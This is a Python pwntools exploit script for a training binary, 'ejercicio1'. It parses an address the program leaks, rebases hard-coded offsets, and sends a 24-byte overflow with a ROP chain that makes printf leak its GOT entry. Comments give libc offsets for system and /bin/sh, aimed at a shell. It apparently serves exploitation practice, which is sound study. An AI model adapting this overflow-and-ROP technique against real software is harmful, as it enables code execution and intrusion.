#!/usr/bin/python3
# pwntools driver for the "ejercicio1" training binary: runs it under gdb,
# reads the address the program prints after its prompt, rebases a set of
# hard-coded offsets on that value, sends a padded chain, reads a second
# printed address and then hands the session over to the user.
#
# Every constant below (0x118d, 0x101a, 0x1233, ...) belongs to this one
# build of ./ejercicio1; none of them line up with any other binary.
from pwn import *
fileName = "./ejercicio1"
e = ELF(fileName) #Checksec ejercicio1
# gdb commands executed before the process runs: a single breakpoint on `vuln`.
gdbs = '''
b vuln
'''
#p = process(fileName) # process without GDB debugging
p = gdb.debug(fileName, gdbscript = gdbs) # process with GDB debugging, sending a continue
libc = e.libc  # resolved but never read again below; libc offsets only appear in comments
# The program prints a hex address right after this prompt. That single
# printed pointer is what makes every rebased address below computable;
# without it the fixed offsets could not be placed at runtime.
print(p.recvuntil(b"Ya sabes que hacer:"))
leak = p.recvline().split(b"\n")
leak = int(leak[0],16)  # first line after the prompt, parsed as base-16
vuln = 0x118d           # file offset the printed address is taken to correspond to
offset = leak - 0x118d  # presumably the load base: `leak` is assumed to be `vuln`'s runtime address
full_vuln = offset + 0x118d  # equals `leak`; only referenced in the commented-out chain below
# Addresses rebased on `offset`. The names are the author's; what sits at
# 0x101a / 0x1233 / 0x122d / 0x1231 is not visible in this script.
ret = offset + 0x101a
poprdi = offset + 0x1233
poprsp_r15 = offset + 0x122d  # only used in the commented-out chain
poprsi_r15 = offset + 0x1231
got_printf = offset + 0x3fc8  # GOT slot of printf, per the name
printf = offset + 0x1060
main = offset + 0x1169  # not used below
format_printf = offset + 0x2004
# '0x50ae0' system in libc
# '0x1d7cba' /bin/sh in libc
print (hex(leak))
print (hex(vuln))
print (hex(offset))
payload = b'A' * 24 # 24 filler bytes (0x41) ahead of the chain
# Earlier chain variants, left commented out by the author:
#payload += b'B' * 8 # equals \x42, RET address
#payload += p64(ret)
#payload += p64(poprsi_r15)
#payload += p64(got_printf)
#payload += p64(0)
#payload += p64(poprdi)
#payload += p64(got_printf)
#payload += p64(poprsp_r15)
#payload += p64(full_vuln)
#payload += p64(ret)
#payload += p64(ret)
#payload += p64(printf)
#payload += p64(full_vuln)
# Active chain. Going by the variable names, it sets rdi to the format
# string and rsi to printf's GOT entry, calls printf, then lands on `ret`;
# the value printed is read back as the second "leak" further down.
payload += p64(poprdi)
payload += p64(format_printf)
payload += p64(poprsi_r15)
payload += p64(got_printf)
payload += p64(0)
#payload += p64(0)
#payload += p64(0)
#payload += p64(ret)
payload += p64(printf)
payload += p64(ret)
#print(p.recvuntil(b"hacer:"))
p.sendline(payload)  # sendline appends a newline after the payload bytes
print(p.recvuntil(b":"))
# Second printed value: whatever the chain made printf emit, parsed as hex.
leak = p.recvline().split(b"\n")
leak = int(leak[0],16)
print (hex(leak))
p.interactive()